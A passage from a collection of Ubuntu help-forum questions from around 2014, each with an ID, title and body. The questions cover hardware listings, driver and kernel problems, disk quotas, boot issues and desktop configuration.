66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:45 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : f7a16000-f7a167ff *-serial unclaimed description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7a15000-f7a150ff ioport : f040 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : toshiba mq01abd0 vendor : toshiba physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : ax0r serial : 63kap6nwt size : 698gib ( 750gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=a3494852-ad5d-443a-a844-7b02c100f873 sectorsize=4096 *-volume:0 description : windows ntfs volume vendor : windows physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 5e1f-84c6 size : 298mib capacity : 299mib capabilities : boot precious readonly hidden nomount ntfs initialized configuration : clustersize=4096 created=2014-02-10 15:41:03 filesystem=ntfs label=genoprettelse modified_by_chkdsk=true mounted_on_nt4=true name=basic data partition resize_log_file=true state=dirty upgrade_on_mount=true *-volume:1 description : windows fat volume vendor : msdos5.0 physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 logical name : /boot/efi version : fat32 serial : 5821-bc28 size : 83mib capacity : 99mib capabilities : boot fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro name=efi system partition state=mounted *-volume:2 description : reserved partition vendor : windows physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 serial : cf8dd34a-f89d-4b37-8532-c8ddf56ce1e5 capacity : 127mib capabilities : nofs configuration : name=microsoft reserved partition *-volume:3 description : windows ntfs volume vendor : windows physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 version : 3.1 serial : 06ce4620-25f3-ce44-a4af-123e7565e8f9 size : 500gib capacity : 500gib capabilities : ntfs initialized configuration : clustersize=4096 created=2014-02-10 15:41:27 filesystem=ntfs name=basic data partition state=clean *-volume:4 description : ext4 volume vendor : linux physical id : 5 bus info : scsi @ 0:0.0.0,5 logical name : /dev/sda5 logical name : / version : 1.0 serial : 93112633-4e55-4975-9514-99c6a321d072 size : 18gib capacity : 18gib capabilities : journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2014-02-10 23:54:43 filesystem=ext4 lastmountpoint=/ modified=2014-02-11 07:20:47 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-02-11 07:20:48 state=mounted *-volume:5 description : linux swap volume vendor : efi physical id : 6 bus info : scsi @ 0:0.0.0,6 logical name : /dev/sda6 version : 1 serial : bb72bdde-6b78-45e9-8882-2c9364e83704 size : 976mib capacity : 976mib capabilities : nofs swap initialized configuration : filesystem=swap pagesize=4095 *-volume:6 description : linux swap volume vendor : linux physical id : 7 bus info : scsi @ 0:0.0.0,7 logical name : /dev/sda7 version : 1 serial : d8c345c3-27e6-44db-9484-35283032b8aa size : 976mib capacity : 976mib capabilities : nofs swap initialized configuration : filesystem=swap pagesize=4095 *-volume:7 description : ext4 volume vendor : linux physical id : 8 bus info : scsi @ 0:0.0.0,8 logical name : /dev/sda8 logical name : /home version : 1.0 serial : 3977a278-7e61-4c96-9a32-83b8107b0491 size : 175gib capabilities : journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2014-02-10 23:54:46 filesystem=ext4 lastmountpoint=/home modified=2014-02-11 07:20:49 mount.fstype=ext4 mount.options=rw , relatime , data=ordered mounted=2014-02-11 07:20:49 state=mounted *-scsi:1 physical id : 2 logical name : scsi2 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd a da8a5sh vendor : slimtype physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 1aa3 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-scsi:2 physical id : 3 bus info : usb @ 3:2 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb size : 7648mib ( 8019mb ) capabilities : partitioned partitioned : dos configuration : sectorsize=512 signature=ea30fdfe *-volume description : windows ntfs volume physical id : 1 bus info : scsi @ 6:0.0.0,1 logical name : /dev/sdb1 logical name : /media/peter/uui version : 3.1 serial : c043-9a39 size : 7645mib capacity : 7646mib capabilities : primary bootable ntfs initialized configuration : clustersize=65536 created=2014-02-10 20:35:24 filesystem=ntfs label=uui modified_by_chkdsk=true mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 mounted_on_nt4=true resize_log_file=true state=mounted upgrade_on_mount=true pinging own device ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 127.0.0.1 : icmp_seq=1 ttl=64 time=0.016 ms 64 bytes from 127.0.0.1 : icmp_seq=2 ttl=64 time=0.040 ms 64 bytes from 127.0.0.1 : icmp_seq=3 ttl=64 time=0.043 ms 64 bytes from 127.0.0.1 : icmp_seq=4 ttl=64 time=0.045 ms -- - 127.0.0.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2998ms rtt min/avg/max/mdev = 0.016/0.036/0.045/0.011 ms i ca n't see networks and when i 'm in network configuration i wifif is turned off and i ca n't turn it on
419127	how to limit disk space per user on ubuntu 13.10 ?	i am new on ubuntu . i want to limit the disk space per user . for example : jhon doe 10gb , jane 20gb , and so on . i wrote the following code as root : gedit /etc/fstab . in the new window i got this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/hfuserver-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=74b91621-bc0c-4a48-8d35-49b1fdd31542 /boot ext2 defaults 0 2 /dev/mapper/hfuserver-swap_1 none swap sw 0 0 what do i need to change ?
419128	how do i fix the brightness on a lenovo ideapad s210 ?	i have installed ubuntu 13.10 on my lenovo ideapad s210 touch and everything works fine except the screen brightness which can not be adjusted . how can i fix this problem ?
419134	low graphics mode when using an nvidia gtx 760	every time after install nvidia drivers i have an error `` low graphic mode '' ( i tried nvidia-current , the newest from nvidia.com and synaptic ) i had a some other problems with nouveau too but nouveau.modeset=0 helped mostly . any ideas with nvidia drivers ? reinstalling nvidia-current does n't help no additional drivers show up other than the default .
419137	how can i remove a file that looks like a flag ?	while using grep with -og flag i accidentally create a file named -v. -rw-rw-r -- 1 username username 334 feb 10 14:29 -v now i can not figure out how to get rid of it . i 've tried : rm -v rm `` -v '' rm '-v' rm -f `` -v '' rm \-v this is on a server so i only have the command line . how do i remove this file ?
419138	12.04 lts installation problems	my problems started a couple of days ago when i was trying to update ubuntu 12.04 lts and my computer froze up which left me having to reboot the pc using the power button . this led to mouse problems in that i was unable to use my mouse once ubuntu had loaded . in turn , this led to me uninstalling ubuntu completely . i had initially installed it using the windows installer . i tried this again , only for ubuntu to get to the log in screen and , before i could even type my password , the screen would fade to the ubuntu purple/maroon color ( or whatever it 's supposed to be ) , my keyboard lights and hd tower lights would all go off and nothing would happen . i rebooted into windows ( using the power button as it was the only way to reboot ) , uninstalled ubuntu again , and installed kubuntu using the windows installer . this worked fine once it eventually installed , but only for a couple of hours after which it froze on me like ubuntu had initially . i booted into windows again , uninstalled kubuntu , and installed ubuntu using a dvd disk . this seemed to work fine but i did n't like ubuntu installed that way and would have preferred to have it installed with windows . so , after restoring my windows mbr and deleting ubuntu from its own partition etc , i tried reinstalling ubuntu ( yet again ! ) via the windows installer ... this led to my original reinstallation problem of getting to the ubuntu log in screen only for it to fade out to purple/maroon before i can type in my password , and having all my keyboard and hd lights go off and nothing happen . sorry this is so long-winded , but can someone please tell me what the heck is going on ? ? i never had any problems with ubuntu until trying to update recently , but now i ca n't even get it to load : - ( thanks .
419141	why does n't gphoto2 trigger in time	i want to remote-controle my dslr with an ubuntu-pc and make a timelapse-video . i found out , that i should use gphoto2 for that . but i 've got a problem with it.i type into the terminal : gphoto2 -- capture-image -f 10 -i 5 thereby gphoto2 should take 10 pictures with a interval of 5 seconds . but now gphoto2 sometimes needs more time than 5 seconds for one picture and it sometimes does n't trigger before 6 to 8 seconds . for a timelapse-video thats very bad of course . but that 's not a problem of the shutter speed . the shutter speed is only a split second . when i trigger by myself on the camera the picture is saved in approx . half a second and the camera is ready to take the next picture . but gphoto2 calculates up and down and saves something and needs much more time for one photo . is it possible to turns this fuss ? i 'd be very thankful if you could help me . btw : i 'm using 13.10 , the cmera is a canon eos 700d ( canon eos rebel t5i ) and it 's attached to my pc via the included usb-cble .
419144	running apt-get -f install , now in a loop	i was installing a package ( ubuntu 12.04 64 bit ) and was told there were dependencies not applied to my install . as advised i ran 'sudo apt-get -f install ' to fix them , but ran out of space in /boot during the process . i freed up space in /boot but now , i ca n't apply anything because i 'm in a loop of : moodle : /boot $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : php-fpdf linux-headers-3.2.0-44-generic linux-headers-3.2.0-52-generic linux- headers-3.2.0-44 linux-headers-3.2.0-51 linux-headers-3.2.0-52 unzip libphp-magpierss mimetex smarty php5-curl libphp-snoopy linux-image-3.2.0-51- generic php5-xmlrpc libjs-yui libphp-pclzip zip linux-headers-3.2.0-51-generic php5-ldap linux-image-3.2.0-44-generic linux-image-3.2.0-52-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 112 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.54.64 ) ; however : version of linux-image-server on system is 3.2.0.58.69. linux-server depends on linux-headers-server ( = 3.2.0.54.64 ) ; however : version of linux-headers-server on system is 3.2.0.58.69. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any suggestions ? regards , gord
419149	how to get a midi keyboard working in 13.10 ?	i try to get my midi keyboard running with lmms . the device ( a yamaha psx e223 connected via a midi-mate 2 ) is listed when i run : amidi -l io hw:1,0,0 usb device 0x2573:0x10c2 midi 1 io hw:1,0,1 usb device 0x2573:0x10c2 midi 2 when i type lsusb its not listed . inside lmms whenever i configure midi in settings it always jumps back to 'dummy ' after i restart lmms to apply the new settings . i also tryed to setup jack but always get these errors when trying to start it : mon feb 10 22:16:34 2014 : error : control open `` /dev/audio '' ( no such file or directory ) mon feb 10 22:16:34 2014 : error : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 mon feb 10 22:16:34 2014 : error : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 mon feb 10 22:16:34 2014 : error : audio device hw:0 can not be acquired ... mon feb 10 22:16:34 2014 : error : can not initialize driver mon feb 10 22:16:34 2014 : error : jackserver : :open failed with -1 mon feb 10 22:16:34 2014 : error : failed to open server edit . : in aseqdump no events show up any ideas how to proceed ?
419150	unstable wifi for intell wireless-n 7260	wifi is unstable . to several networks i can connect and use the wifi for about 5 minutes and after that the wifi keeps trying go connect back to the network but it will not work anymore . originally when i installed 12.04 my wifi was not working at all and i had to upgrade my kernel to 3.10.10-031010-generic . wifi card : intel wireless-n 7260 , single band bgn ( 2.4ghz ) , 300mbps + bluetooth 4.0 ( wireless display ) http : //www.laptopplus.nl/product-details/15-6-inch-bto-vbook-15cl17-full-hd-ips/1027115/ # ixzz2sxoenmld lspci -nn | grep 7260 : 03:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b1 ] ( rev 73 ) rfkill list all : 1 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no
419151	how to save live log bash input to a file ?	when i am teaching a class , some students have problems following my cli commands and would like to scroll back to be able to repeat the steps in their own speed . so i 'd like to log all my inputs in realtime to an html-file or something similar , which i could server through a webserver . that way , the students could simply go to http : //example.com/log # end and would always see the last entries . i do know the multiuser mode of screen and have already used it to share sessions . however , i need to disable the write access of students and unfortunately , they are unable to scroll up , if i do so . i also had a look at script , but it generates a terrible output , which - even when filtered through col -bp < logfile > > output.html is unreadable . also , it does log the output as well , which complicates things and only dumps the logfile in unforeseeable intervals . .bash_history could be used , but is only dumped to file when the session ends . any ideas ?
419152	install older kernel in a server and made it the default boot option in grub	i need to install an older kernel version ( 3.2.0-24-generic ) on an existing ubuntu 12.04.3 ( 3.8.0-34-generic ) lamp server and a new install ubuntu 12.04.4 ( 3.11 ) . after the installation i will need to stop the kernel from updating . both servers are vms on a esx 5.5 host . i have some software that is only supported on 12.04 and 3.2.0 kernel that i would like to install on these two servers . here are my questions : will installing and using an older kernel affect any software currently installed ? are there any negative effects to downgrading the kernel ? is the process below correct for what i am trying to do ? what i have found so far on how to do this is ... install 3.2.0-24 kernel sudo apt-get install linux-image-3.2.0-24-generic linux-headers-3.2.0-24-generic make a backup of grub sudo cp /etc/default/grub /etc/default/grub.bak edit grub to set default kernel at boot sudo gedit /etc/default/grub change line grub_default=0 to grub_default=”2 > 0” and saved changes update grub sudo update-grub place a dpkg hold on the kernel to stop it from updating echo “linux-image-3.2.0-24-generic hold” | sudo dpkg -- set-selections echo “linux-headers-3.2.0-24-generic hold” | sudo dpkg -- set-selections
419155	defining aliases with byobu	i want to have a few aliases for my byobu sessions , but i 'm not sure where in the byobu files i 'm supposed to put the commands ( alias < name > < command > ) .
419162	nvidia drivers removal + locating suitable drivers , how ?	would it work if i were to do the removal of the nvidia drivers using synaptic 's removal complete , then , without rebooting ( to avoid ubuntu choosing drivers on its own during the booting process/loading ) do the installation of the new drivers via the terminal commands to install the latest as shown in softpedia ? sorry i ask instead of trying myself . but i 'm at work as i type this : ( + being a family man my time is so precious if you know what i mean . thanks in advance guys/gals , jdl
419167	libreoffice wo n't start	trying to start libreoffice , i get : /usr/bin/libreoffice : 161 : exec : /usr/bin/oosplash : not found i messed up recently with libreoffice by executing : sudo sed -i 's/x-gio-nofuse=true/ # x-gio-nofuse=true/ ' /usr/share/applications/libreoffice-* sudo sed -i 's/x-gio-nofuse=true/ # x-gio-nofuse=true/ ' /usr/bin/libreoffice i tried : sudo apt-get remove libreoffice-core followed by : sudo apt-get install libreoffice do you have any idea on how i can fix that ?
419169	how do i make a sudo command start at start-up with a 1 minute delay ?	i would like to make a sudo command ( sudo service smbd restart ) run after 1 minute of being logged on . how would i go about doing this ? p.s . this is a system with no monitor , mouse , keyboard or speakers connected - i 's a printer and file server .
419175	is there a more touch friendly desktop environment ?	i have an acer aspire r7 , its a convertible laptop/tablet . i am interested in running a ui which is more like ubuntu touch . i installed the 13.10 thinking it was going to be more touch friendly , but it is not . is there some desktop environment or window manager i can use that has a more touch friendly ui ? i 'd like swiping , and scrolling to be more like android or windows 8 than like mouse driven interfaces .
419177	grub wo n't boot to windows 7	i installed ubuntu alongside windows 7 , and when i turn on my laptop and grub opens and i select windows from the grub boot menu , the system takes over not letting me choose which os to boot . please make the answer easy to understand as i do not have any knowledge of programming .
419180	ca n't seem to boot into ubuntu 13.04/13.10 on surface pro	i 'm recently trying to get a version of linux ( specifically ubuntu ) installed on my surface pro as the host os . i 've followed a few tutorials which all have the almost the same instructions and for some reason am still having troubles . i 've also tried multiple distros including : ubuntu 13.04/13.10 , ubuntu 12.04 lts , kubuntu 13.04 , latest version of mint , and a few other random distros . with all of them i get the same outcomes : live cd works fine ( no internet ) install goes smoothly ; no errors at all after install if i reboot into a live usb the hard drive of the surface shows ubuntu was installed i can access and change files on the hard drive when using a bootable windows 8 usb it shows that the hard drive does indeed have ubuntu on it . the problem is that if i turn on the surface with a bootable usb drive it goes straight into the drive and if i turn it on without a bootable drive it just goes to the bios that the surface has . i 've tried to manually install grub but that has n't worked either . any solutions would really be helpful ! link to tutorial i 've been using mainly , although most of them are along the same lines : http : //www.geek.com/microsoft/how-to-install-ubuntu-on-the-surface-pro-1539262/ also , once i was able to boot into ubuntu and get to the login screen but when i would only have a few seconds before the entire system froze . getting here is random and has only been reached using ubuntu/kubuntu .
419182	how to clean /dev/nbd device that makes processes to hang ?	i am using devstack on ubuntu 13.10 . once in a while lvs hangs when cleaning the stack . after some investigation , i found that the issue seems to come from a `` corrupted '' nbd device . any process that tries to access that device hangs ( lvm , vgdisplay , nbd-client , ... ) . there is no way to stop those processes ( even sudo kill -9 has no effect ) . using strace i found that the hang occurs when opening the nbd device . stat ( `` /dev/nbd15 '' , { st_mode=s_ifblk|0660 , st_rdev=makedev ( 43 , 240 ) , ... } ) = 0 open ( `` /dev/nbd15 '' , o_rdonly|o_direct|o_noatime is there a way to clean the nbd device without rebooting the server ?
419183	how can i use ubuntu as a kiosk ?	how can i make a kiosk machine out of ubuntu ? looking to boot into a web browser and have them only available to search university pages , have an auto-log out after 2 minutes , and be locked down where an average user cant change any settings . using 12.04 since this computer will be stationary for the next two-three years . i tried following the instructions from http : //www.instructables.com/id/setting-up-ubuntu-as-a-kiosk-web-appliance/step8/testing/ but it didnt work and i could not find `` login screen '' settings either .
419184	`` no screens found '' on live cd with nvidia optimus	i have a lenovo y410p , and i am trying to install ubuntu 13.10 in efi mode side-by-side with a windows 8 installation on a gpt partition . i have already disabled secure boot , and i have the livecd image running off a usb flash drive in efi mode . when i get to the grub environment , i have to modify the kernel arguments to put nomodeset=1 or the screen will be turned off when the kernel starts . lsmod shows that the following modules are loaded for video : i915 nouveau the former is just the usual intel graphics driver , and the latter is the open source nvidia driver . when x starts , in /etc/x11/xorg.0.log it reports that a screen was found but it was not properly configured , and then it shows `` no screens found '' . starting with nomodeset=1 in install ubuntu instead of try ubuntu works fine . after installation , the same issue occurs as on the live environment . no dice . not sure where to go from here .
419186	how do i open up a zipfile of a subtitle and embed it onto a video ?	would someone please give me explicit step by step instructions how to install an external subtitle onto a foreign video that i will play on smplayer . i know how to download the zip file from google and once the text version of the file is in my download file i know how to drag and drop that text onto the video . i just do n't know the intervening steps very well . somewhere along the line i seem to recall using a text editor ... the hardest part was getting that text from the text editor into my download file please dont tell me to open it up like any other zip file because i have no idea how to do that . thanks
419188	installing groupwise client 8 on unbuntu 13.10	has anyone installed groupwise client 8 for linux on ubuntu 13.10 ? if so , i would very much like instructions . alternatively , groupwise client 2012 for windows via crossover/wine would also be a good solution .
419195	ca n't choose to boot ubuntu in uefi . only able to select a disk	first of all , i 'm not entirely sure ubuntu is on my ssd , where i would like it to be . according to the installer , however , `` our computer already has windows 8 and ubuntu 13.10 installed on it '' . the main problem , though , is that in uefi , i only have the option to boot to my samsung 840 , which supposedly contains both os 's . it chooses to go straight to windows , however , and i 'm not sure what to do .
419196	installing driver for asus usb-ac56 - part 2	this was predominantly answered in this thread how do i install an asus usb-ac56 wifi adapter ? unlike the original requester the instruction provided by chili555 ( sorta ) works* for me , even on usb2.0 port the device shows as realtek 802.11n nic installed the driver i indicated in the original post from the rtl8812au_8821au_linux-master package ( this is a revision 4.2.2 driver ) : the good news - again that install completes and sees the usb adapter and allows it to connect to my router ; the bad news - compared to the internal adapter the measured download speed ( using a browser speedtest ) is only about 7mbps vs 40mbps ( 7 at best and extremely sensitive to position ) now - i found however , that if i am in direct line of sight of the router , the speed comes up to normal - so somehow it appears there is potentially less power to the device , which is affecting its range ? the same device in the same physical location running under windows is flawless . 1 ) ac56 vs internal adapter performs much slower when both at same physical location removed from direct line of sight of router 2 ) in the same physical location , the ac56 performs much worse under linux than windows = > perhaps less power to the device in linux which is affecting its range ? however the download speed is really slow : i only get about 1.3 mbps on this adapter ; 20mbs on the internal adapter ; i get over 50 mbps in windows . i.e . i know its not my isp or my adapter itself - something is choking it in ubuntu problem statements : the 4.2.2 driver referenced above will successfully 'make ' and install and fundamentally work ; however unless within immediate close-proximity , line-of-sight to router , the performance will be severely compromised . the 4.2.5 driver from the asus site , which appears from the overview may address this performance issue , will not install . so i have a related question which may or not resolve the speed issue - how to install the proprietary asus driver module the original syntax per link above showed to download that specific driver file and how to load it : however i have since found the asus proprietary driver for linux off the asus web-site : https : //www.asus.com/networking/usbac56/ # support it seems like the latest driver listed on the asus site might address the issue i 'm seeing with the limited range with the open-source driver update mac/bb/rf parameters and mechanism to improve overall performance . but i simply can not get this driver loaded . i 've tried using the install.sh file ( making it executable and then executing it ) and also making/installing just the driver folder itself - no joy with either method . the install.sh file is now completing without causing the corruption problems i had originally : below is the conclusion at the end of the install.sh execution script and lsmod shows the 8812au driver ( first line after lsmod ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver ok ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ./install.sh : 68 : [ : unexpected operator authentication requested [ root ] for remove driver : password : error : module 8812au is not currently loaded authentication requested [ root ] for insert driver : password : authentication requested [ root ] for install driver : password : install -p -m 644 8812au.ko /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/ /sbin/depmod -a 3.11.0-12-generic # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # the setup script is completed ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ken @ ken-1005ha ~/downloads/rtl8812au_linux_v4.2.5_10143.20140103_asus $ lsmod module size used by 8812au 905927 0 nls_iso8859_1 12617 0 usb_storage 48294 0 eeepc_wmi 12983 0 asus_wmi 23495 1 eeepc_wmi coretemp 13195 0 sparse_keymap 13708 1 asus_wmi joydev 17097 0 bnep 18893 2 dm_multipath 22402 0 rfcomm 53664 0 parport_pc 31981 0 scsi_dh 14458 1 dm_multipath arc4 12536 2 ppdev 17391 0 bluetooth 323534 10 bnep , rfcomm ath9k 135969 0 ath9k_common 13619 1 ath9k ath9k_hw 429197 2 ath9k_common , ath9k ath 19187 3 ath9k_common , ath9k , ath9k_hw however when i plug in the adapter it is not activated : after re-starting i do n't initially see 8812au listed when i request lsmod ; but if i plug in the the adapter , then i do . however if i physically remove it , the driver remains loaded . in this state , the terminal will not respond to most commands ( other than list ) and neither software manager or upgrade drivers will load from the menu . if i restart the system , these will all function normally before the usb adapter is inserted . if i request modinfo 8812au i get this : $ modinfo 8812au filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/8812au.ko version : v4.2.5_10143.20140103_asus author : realtek semiconductor corp. description : realtek wireless lan driver license : gpl srcversion : 3d847c44ae897b16dfca0eb alias : usb : v2001p3316d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3315d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07b8p8812d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019pab30d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1740p0100d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1058p0632d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3313d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0586p3426d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0e66p0022d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0b05p17d2d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0409p0408d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0789p016ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04bbp0952d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0df6p0074d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v7392pa822d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p330ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp1106d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap881cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap881bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap881ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8812d*dc*dsc*dp*ic*isc*ip*in* depends : vermagic : 3.11.0-12-generic smp mod_unload modversions 686 parm : rtw_ips_mode : the default ips mode ( int ) parm : rtw_usb_rxagg_mode : int parm : rtw_regulatory_id : int parm : ifname : the default name to allocate for first interface ( charp ) parm : if2name : the default name to allocate for second interface ( charp ) parm : rtw_initmac : charp parm : rtw_channel_plan : int parm : rtw_chip_version : int parm : rtw_rfintfs : int parm : rtw_lbkmode : int parm : rtw_network_mode : int parm : rtw_channel : int parm : rtw_mp_mode : int parm : rtw_wmm_enable : int parm : rtw_vrtl_carrier_sense : int parm : rtw_vcs_type : int parm : rtw_busy_thresh : int parm : rtw_ht_enable : int parm : rtw_bw_mode : int parm : rtw_ampdu_enable : int parm : rtw_rx_stbc : int parm : rtw_ampdu_amsdu : int parm : rtw_vht_enable : int parm : rtw_lowrate_two_xmit : int parm : rtw_rf_config : int parm : rtw_power_mgnt : int parm : rtw_smart_ps : int parm : rtw_low_power : int parm : rtw_wifi_spec : int parm : rtw_antdiv_cfg : int parm : rtw_antdiv_type : int parm : rtw_enusbss : int parm : rtw_hwpdn_mode : int parm : rtw_hwpwrp_detect : int parm : rtw_hw_wps_pbc : int parm : rtw_max_roaming_times : the max roaming times to try ( uint ) parm : rtw_mc2u_disable : int parm : rtw_80211d : enable 802.11d mechanism ( int ) parm : rtw_notch_filter:0 : disable , 1 : enable , 2 : enable only for p2p ( uint ) parm : rtw_tx_pwr_lmt_enable:0 : disable , 1 : enable , 2 : depend on efuse ( int ) parm : rtw_tx_pwr_by_rate:0 : disable , 1 : enable , 2 : depend on efuse ( int ) parm : rtw_phy_file_path : the path of phy parameter ( charp ) parm : rtw_load_phy_file : phy file bit map ( int ) parm : rtw_decrypt_phy_file : enable decrypt phy file ( int ) more : i disabled my internal wireless adapter - ath9k - in case of conflicts with both running - it definitely is stopped , but still nothing on the usb adapter next - rfkill list 1. asus-wlan : wireless lan soft blocked : no hard blocked : no edit : found that the issue is , 4.2.5 will not load into 3.11 kernel ; however will successfully install in < 3.10 - i ran it in 3.8 and it installed with no issues . also pleased to report that the performance issues associated with 4.2.2 appear to have been improved considerably in 4.2.5 so - partially resolved - in that the 4.2.5 driver will work in kernel < 3.10 hopefully a full fix will come with a modification to run in 3.11 now - completely resolved - great job by abperiasamy to see what the conflict was in 3.11 and modify so now we have a loadable working driver with the improved range ! https : //github.com/abperiasamy/rtl8812au_8821au_linux/issues/1
419199	which software controls the fan on dell sputnik ?	as far as i know project sputnik from dell , it is a developer notebook with ubuntu installed . this notebook has a fan and some kernel module / driver / user land app to handle turning it on and off . does anyone could tell me which software controls the fan in this ubuntu ? any reference .
419203	brother mfc 665cw printer not printing	i finally installed brother mfc665cw . when i went to localhost:631/printers/ , they are all idle . when i go to my scanner , i click `` send image . '' it says `` connecting to pc '' but never scans or does anything . using ubuntu .
419205	`` show desktop '' with `` hot corners '' not working !	the function show desktop when moving mouse to the hot corners in ubuntu 13.04 worked . after updating to 13.10 , show desktop/hot corners only works until rebooting or setsid unity , after which it does n't work . i thought that something was wrong in the update to 13.10 , so i made a clean install of ubuntu 14.04 to find out that the same issue exists . what can i do to make show desktop/hot corners work again ? i have already tried to reset compiz and unity , and i did fresh install .
419207	dell latitude d630 wireless issues running ubuntu 13.10	i just installed ubuntu 13.10 on my dell latitude d630 . i 'm new to linux and do n't know too much about it . i 've researched a few solutions to this problem , but none have worked , or i could n't complete the steps . one main problem is that when i 'm using the terminal , every once in a while it just stops and when i try to close it , it warns me that a process is running . i 've been trying to get ndisgtk to install the appropriate driver , but the terminal does that thing and when i tried to just go though the online sources , it just froze on the side bar saying `` preparing to install '' or some such and made no progress . is there any way i can solve the wireless issues ? snarky @ snarky-latitude-d630 : ~ $ lspci -nn | grep 0280 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
419208	upgrading dualboot to win 8.1	i have my ideapad y400 dualbooting ubuntu 13.10 and win8 , both in efi . i do n't honestly know how i managed it . is there any chance that updating win8 to win8.1 via the microsoft store would break my dual installation ?
419210	what mechanism does ubuntu 13.10 use to turn screen off ?	i am having an issue where sometimes after my screen turns off , and i move the mouse to turn it back on , the monitor turns back on , but just shows a black screen , and i have to reboot . to try to debug this , i am trying to figure out what mechanism ubuntu is using to turn my screen off . under all settings > brightness & lock > turn screen off when inactive for , i have set 10 minutes . however , the command xset q returns dpms ( energy star ) : standby : 0 suspend : 0 off : 0 dpms is enabled monitor is on so what exactly is it that 's turning my screen off if each of these values is equal to 0 ? thanks !
419211	how can i turn off sound effects/alert notification while allowing skype notifications to still work ?	i have 13.10 with latest skype from ubuntu repository . i prefer to have have alert volume set to 0 ; however , have discovered that this will mute skype notifications . how can i turn off sound effects/alert notification while allowing skype notifications to still work ?
